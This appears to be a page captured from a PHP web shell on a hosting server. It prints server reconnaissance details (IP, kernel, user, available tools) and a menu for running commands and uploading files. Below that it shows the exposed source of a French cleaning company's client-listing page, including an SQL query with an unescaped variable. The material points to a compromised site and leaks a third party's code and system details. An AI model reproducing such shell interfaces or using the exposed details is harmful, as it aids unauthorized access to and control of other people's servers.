|
Server IP : 10.128.40.6 / Your IP : 216.73.216.233 Web Server : Apache System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : logmcpe ( 111175) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/logmcpe/www/TEST/www/../../MC/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
include_once 'code/init.php';
print_header ();
$style ='';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="fr" xml:lang="fr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Ménage et cie</title>
<link rel="shortcut icon" href="favicon.ico" />
</head>
<body>
<h3>Clients sans remise de clé renseignée :</h3>
<?php
$presence = dbi_query("SELECT * FROM ".TABLE_CLIENT." WHERE agence_id = '$agence' AND client_present='0' AND client_prospect='0' AND client_actif='0' AND client_genre!='FORMATION'") ;
$a_faire = '';
while ($a = dbi_fetch_row($presence))
{
echo '<pre>';
print_r($a);
echo '</pre>';
// $a_faire .= '<li'.$style.'><a href="top.php?link=client&page=aad&id='.$a['client_id'].'" target="ident">'.$a['nom'].'</a></li>';
}
?>
</body>
</html>
